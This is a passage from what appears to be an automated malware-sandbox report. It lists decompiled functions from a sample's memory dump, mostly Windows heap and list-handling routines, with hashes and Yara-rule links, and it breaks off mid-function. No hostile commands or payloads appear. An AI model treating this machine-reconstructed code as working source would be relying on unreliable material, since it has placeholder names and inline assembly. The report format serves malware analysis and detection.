                                                              • Instruction Fuzzy Hash: 5D210836705690EFDB15DB68C945B2577E8EF94340F1900A0EE048B793E734DC40C791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AA7794 Relevance: .1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 82%
                                                              			E00AA7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0xb17b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L00A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E00A6F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E00A47D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E00A69AE0();
					_t24 = L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                              0x00aa7799
                                                              0x00aa779a
                                                              0x00aa779b
                                                              0x00aa77a3
                                                              0x00aa77ab
                                                              0x00aa77ae
                                                              0x00aa77b1
                                                              0x00aa77b1
                                                              0x00aa77bf
                                                              0x00aa77c4
                                                              0x00aa77c8
                                                              0x00aa77ce
                                                              0x00aa77d4
                                                              0x00aa77e0
                                                              0x00aa77e0
                                                              0x00aa77d6
                                                              0x00aa77d6
                                                              0x00aa77de
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa77de
                                                              0x00aa77e5
                                                              0x00aa77f0
                                                              0x00aa77f3
                                                              0x00aa77f6
                                                              0x00aa77fd
                                                              0x00aa7800
                                                              0x00aa780c
                                                              0x00aa7818
                                                              0x00aa782b
                                                              0x00aa781a
                                                              0x00aa7823
                                                              0x00aa7823
                                                              0x00aa7830
                                                              0x00aa7831
                                                              0x00aa7838
                                                              0x00aa783d
                                                              0x00aa783e
                                                              0x00aa784f
                                                              0x00aa784f
                                                              0x00aa785a

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9892505f2d4f90f9f7fc92635f5b1c679f7cb6f684367fdfa53b47a8e328da44
                                                              • Instruction ID: bf1336830cacf2d55b702567b34eee253f3b84ab5c126977bbfba714de08d44a
                                                              • Opcode Fuzzy Hash: 9892505f2d4f90f9f7fc92635f5b1c679f7cb6f684367fdfa53b47a8e328da44
                                                              • Instruction Fuzzy Hash: 0C21CD72904604ABC725DF69DC80EABB7B8EF89340F10056DF50AC7790DB34E900CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A5FD9B Relevance: .1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 93%
                                                              			E00A5FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E00A376E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L00A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                              0x00a5fd9b
                                                              0x00a5fda0
                                                              0x00a5fda1
                                                              0x00a5fdab
                                                              0x00a5fdad
                                                              0x00a5fdb0
                                                              0x00a5fdb8
                                                              0x00a5fe0f
                                                              0x00a5fde6
                                                              0x00a5fde9
                                                              0x00a5fdec
                                                              0x00a9c0c0
                                                              0x00a5fdfe
                                                              0x00a5fe06
                                                              0x00a5fe06
                                                              0x00a9c0c8
                                                              0x00a5fe2d
                                                              0x00a5fe2d
                                                              0x00000000
                                                              0x00a5fe2d
                                                              0x00a9c0d1
                                                              0x00a9c0e0
                                                              0x00a9c0e5
                                                              0x00a9c0e5
                                                              0x00a9c0e8
                                                              0x00000000
                                                              0x00a9c0e8
                                                              0x00a5fdf4
                                                              0x00000000
                                                              0x00000000
                                                              0x00a5fdf6
                                                              0x00a5fdfa
                                                              0x00a5fe1a
                                                              0x00a5fe1f
                                                              0x00a5fe1f
                                                              0x00a5fdfc
                                                              0x00000000
                                                              0x00a5fdfc
                                                              0x00a5fdcc
                                                              0x00a5fdd0
                                                              0x00a5fe26
                                                              0x00000000
                                                              0x00a5fe26
                                                              0x00a5fdd8
                                                              0x00a5fddb
                                                              0x00a5fddd
                                                              0x00a5fde0
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                              • Instruction ID: 0a218985deff26d79af8a136dc2029d1a2409ecdfd03fa09ec48aae3323844bc
                                                              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                              • Instruction Fuzzy Hash: D8215472A00A40DFDB318F0AC640A66B7F5FB94B12F25857AED498BA25D730AC04DB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A29240 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E00A29240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0xaff708);
				E00A7D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E00A695D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E00A695D0();
				_t33 =  *0xb184c4; // 0x0
				L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0xb184c4; // 0x0
				L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0xb184c4; // 0x0
				E00A42280(L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0xb186b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E00A695D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E00A695D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E00A29325();
					_t50 =  *0xb184c4; // 0x0
					return E00A7D0D1(L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                              0x00a29240
                                                              0x00a29242
                                                              0x00a29247
                                                              0x00a2924c
                                                              0x00a2924e
                                                              0x00a29255
                                                              0x00a29257
                                                              0x00a2925a
                                                              0x00a2925f
                                                              0x00a2925f
                                                              0x00a29266
                                                              0x00a29271
                                                              0x00a29276
                                                              0x00a29279
                                                              0x00a2927e
                                                              0x00a29295
                                                              0x00a2929a
                                                              0x00a292b1
                                                              0x00a292b6
                                                              0x00a292d7
                                                              0x00a292dc
                                                              0x00a292e0
                                                              0x00a292e6
                                                              0x00a292e8
                                                              0x00a292ee
                                                              0x00a29332
                                                              0x00a29333
                                                              0x00a29337
                                                              0x00a29338
                                                              0x00a2933a
                                                              0x00a2933a
                                                              0x00a2933d
                                                              0x00a29342
                                                              0x00a29342
                                                              0x00a29345
                                                              0x00a29349
                                                              0x00a2934e
                                                              0x00a29352
                                                              0x00a29357
                                                              0x00a292f4
                                                              0x00a292f4
                                                              0x00a292f6
                                                              0x00a292f9
                                                              0x00a29300
                                                              0x00a29306
                                                              0x00a29324
                                                              0x00a29324

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: abd2d28c2a50f663d935f0324a35da82906d215e1a362affdf3a3882899eb8c8
                                                              • Instruction ID: 33d2ded5fcc4afda469dc453a2200136119b1a0faec5ee4b833b46e0b014a896
                                                              • Opcode Fuzzy Hash: abd2d28c2a50f663d935f0324a35da82906d215e1a362affdf3a3882899eb8c8
                                                              • Instruction Fuzzy Hash: D5212832141640DFC722EF68CE41F5AB7B9BF08704F548568F14A9B6A2CB34E941CB44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A5B390 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 54%
                                                              			E00A5B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E00A42280(_t12, 0xb18608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E00A600C2(0xb18608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                              0x00a5b395
                                                              0x00a5b3a2
                                                              0x00a5b3a5
                                                              0x00a5b3aa
                                                              0x00a5b3b2
                                                              0x00a5b3ba
                                                              0x00a5b3bd
                                                              0x00a5b3c0
                                                              0x00a5b3c4
                                                              0x00a5b3c9
                                                              0x00a9a3e9
                                                              0x00a9a3ed
                                                              0x00a9a3f0
                                                              0x00a9a3ff
                                                              0x00a9a403
                                                              0x00a9a409
                                                              0x00000000
                                                              0x00000000
                                                              0x00a9a40b
                                                              0x00a9a40b
                                                              0x00a9a40f
                                                              0x00a9a415
                                                              0x00a9a423
                                                              0x00a9a423
                                                              0x00a9a415
                                                              0x00a5b3d1
                                                              0x00a5b3e8
                                                              0x00a5b3e8
                                                              0x00a5b3d9

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b90ca6e3a9ad19e2b0333ba90289595cd36975f08f76b1fce18231bcf2236f66
                                                              • Instruction ID: eae4c05142766dfa87aa1eb05cf1bdc0297957d08288387f726d48ff7dfe83a6
                                                              • Opcode Fuzzy Hash: b90ca6e3a9ad19e2b0333ba90289595cd36975f08f76b1fce18231bcf2236f66
                                                              • Instruction Fuzzy Hash: 101166373151109FCB288B148E81A6B72A6FBD5371B79013AED16DB780CE31AC06C6E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB4257 Relevance: .1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 90%
                                                              			E00AB4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0xb008d0);
				E00A7D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E00AB41E8(__ebx, __edi, __ecx, _t39);
				E00A3EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0xb187e4;
					_t18 =  *0xb187e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0xb15cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0xb187e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0xb187e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L00A27055(_t31 + 0xfffffff8);
								_t24 =  *0xb187e0; // 0x0
								_t18 = _t24 - 1;
								 *0xb187e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0xb15cd0;
				if( *0xb15cd0 <= 0) {
					L00A27055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0xb187e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0xb187e8 = _t30;
						 *0xb187e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E00A7D0D1(L00AB4320());
			}















                                                              0x00ab4257
                                                              0x00ab4257
                                                              0x00ab4257
                                                              0x00ab4259
                                                              0x00ab425e
                                                              0x00ab4263
                                                              0x00ab4265
                                                              0x00ab4273
                                                              0x00ab4278
                                                              0x00ab427c
                                                              0x00ab427f
                                                              0x00ab4281
                                                              0x00ab4287
                                                              0x00ab42d7
                                                              0x00ab42d7
                                                              0x00ab42da
                                                              0x00ab428d
                                                              0x00ab428d
                                                              0x00ab428f
                                                              0x00ab4292
                                                              0x00ab4297
                                                              0x00ab429c
                                                              0x00ab42a0
                                                              0x00ab42a6
                                                              0x00ab42a8
                                                              0x00ab42ae
                                                              0x00ab42b3
                                                              0x00000000
                                                              0x00ab42ba
                                                              0x00ab42ba
                                                              0x00ab42bf
                                                              0x00ab42c5
                                                              0x00ab42ca
                                                              0x00ab42cf
                                                              0x00ab42d0
                                                              0x00000000
                                                              0x00ab42d0
                                                              0x00ab42b3
                                                              0x00000000
                                                              0x00ab42a6
                                                              0x00ab429c
                                                              0x00ab42dc
                                                              0x00ab42dc
                                                              0x00ab42e3
                                                              0x00ab4309
                                                              0x00ab42e5
                                                              0x00ab42e5
                                                              0x00ab42e8
                                                              0x00ab42ee
                                                              0x00ab42f0
                                                              0x00000000
                                                              0x00ab42f2
                                                              0x00ab42f2
                                                              0x00ab42f4
                                                              0x00ab42f7
                                                              0x00ab42f9
                                                              0x00ab4300
                                                              0x00ab4300
                                                              0x00ab42f0
                                                              0x00ab430e
                                                              0x00ab431f

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a10340ab4228b96c370a71b170448979fbd55fbb4ed175d06d28a9813e4acdce
                                                              • Instruction ID: dfb4649a89cc1b642bc5931e142ccaec4d7647da519a3c62ac1763e2f8d01b72
                                                              • Opcode Fuzzy Hash: a10340ab4228b96c370a71b170448979fbd55fbb4ed175d06d28a9813e4acdce
                                                              • Instruction Fuzzy Hash: C1215B70900B00CFC715DF24D9406D47BF5FB89314FA4C2AAE1598B2A3DF319892DB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AA46A7 Relevance: .1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 93%
                                                              			E00AA46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L00A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E00A6F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E00A5D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L00A477F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                              0x00aa46b7
                                                              0x00aa46ba
                                                              0x00aa46c5
                                                              0x00aa46c8
                                                              0x00aa46d0
                                                              0x00aa46d4
                                                              0x00aa46e6
                                                              0x00aa46e9
                                                              0x00aa46f4
                                                              0x00aa46ff
                                                              0x00aa4705
                                                              0x00aa4706
                                                              0x00aa470c
                                                              0x00aa4713
                                                              0x00aa471b
                                                              0x00aa4723
                                                              0x00aa4725
                                                              0x00aa46d6
                                                              0x00aa46d9
                                                              0x00aa46db
                                                              0x00aa46db
                                                              0x00aa4732

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                              • Instruction ID: 64dfb894d776c31826e7f7bda0742a07fbb931e3e73f1dafc995104fd1ee8c38
                                                              • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                              • Instruction Fuzzy Hash: 7D11C272504208BBC7159F5C99819BEB7B9EF9A300F10806AF9448B351DB318D55D7A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A52397 Relevance: .1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 29%
                                                              			E00A52397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0xb1848c != 0) {
					L00A4FAD0(0xb18610);
					if( *0xb1848c == 0) {
						E00A4FA00(0xb18610, _t19, _t27, 0xb18610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E00A52581(0xb18610, 0xa050a0, _t26, _t27, _t28);
						E00A4FA00(0xb18610, 0xa050a0, _t27, 0xb18610);
					}
				} else {
					L1:
					_t11 =  *0xb18614; // 0x0
					if(_t11 == 0) {
						_t11 = E00A64886(0xa01088, 1, 0xb18614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E00A52581(0xb18610, (_t11 << 4) + 0xa05070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                              0x00a523b0
                                                              0x00a523b6
                                                              0x00a52409
                                                              0x00a52415
                                                              0x00a95ae9
                                                              0x00000000
                                                              0x00a5241b
                                                              0x00a5241b
                                                              0x00a5241d
                                                              0x00a52427
                                                              0x00a5242e
                                                              0x00a52430
                                                              0x00a52430
                                                              0x00a523b8
                                                              0x00a523b8
                                                              0x00a523b8
                                                              0x00a523bf
                                                              0x00a523fc
                                                              0x00a523fc
                                                              0x00a523c1
                                                              0x00a523c3
                                                              0x00a523d0
                                                              0x00a523d8
                                                              0x00a523d8
                                                              0x00a523dc
                                                              0x00a523de
                                                              0x00a523e1
                                                              0x00a523e1
                                                              0x00a523ec

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: baa88d214e34bea2f05c780535c5c0c6463fe16c0471e2858627b9e53c241d4a
                                                              • Instruction ID: e064d62da34aa516f52203f433148ff0053a0459c00fa8d00ebb80cb95032566
                                                              • Opcode Fuzzy Hash: baa88d214e34bea2f05c780535c5c0c6463fe16c0471e2858627b9e53c241d4a
                                                              • Instruction Fuzzy Hash: 3F112B31700300AFD7219B39AD85B55B2D9FB91761F648036F9069B291DE74D8488754
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A2C962 Relevance: .1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 42%
                                                              			E00A2C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0xb1d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E00A3EEF0(0xb170a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E00AAF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E00A3EB70(_t29, 0xb170a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E00A6B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E00AAF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0xb170c0; // 0x0
					while(_t38 != 0xb170c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0xb1b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                              0x00a2c96a
                                                              0x00a2c974
                                                              0x00a2c988
                                                              0x00a2c98a
                                                              0x00a97c9d
                                                              0x00a97c9f
                                                              0x00a97ca4
                                                              0x00a97cae
                                                              0x00a97cf0
                                                              0x00a97cf5
                                                              0x00a97cfa
                                                              0x00a2c992
                                                              0x00a2c996
                                                              0x00a2c997
                                                              0x00a2c998
                                                              0x00a2c9a3
                                                              0x00a2c9a3
                                                              0x00a97cb0
                                                              0x00a97cb7
                                                              0x00a97cbb
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97cbd
                                                              0x00a97ce8
                                                              0x00a97cc5
                                                              0x00a97cc8
                                                              0x00a97cca
                                                              0x00a97cd0
                                                              0x00a97cd6
                                                              0x00a97cde
                                                              0x00a97ce4
                                                              0x00a97ce4
                                                              0x00a97cd0
                                                              0x00000000
                                                              0x00a97ce8
                                                              0x00a2c990
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 117b58ccc0030130e4daeff5fbd88a087d05aa60517eebf7bb723dcfee8b02ad
                                                              • Instruction ID: 8c6fada77dfe82fb4ae27fc8c9a4c781930d076658ad2f79701a48d07bf37b02
                                                              • Opcode Fuzzy Hash: 117b58ccc0030130e4daeff5fbd88a087d05aa60517eebf7bb723dcfee8b02ad
                                                              • Instruction Fuzzy Hash: B211C2313187169BCB10EF28DD49A6AB7F5BF88714B500539F841936A1DF20EC50C7E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A637F5 Relevance: .1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 87%
                                                              			E00A637F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E00A42280(_t6, 0xb18550);
				}
				_t29 = E00A6387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E00A3FFB0(0xb18550, _t27, 0xb18550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
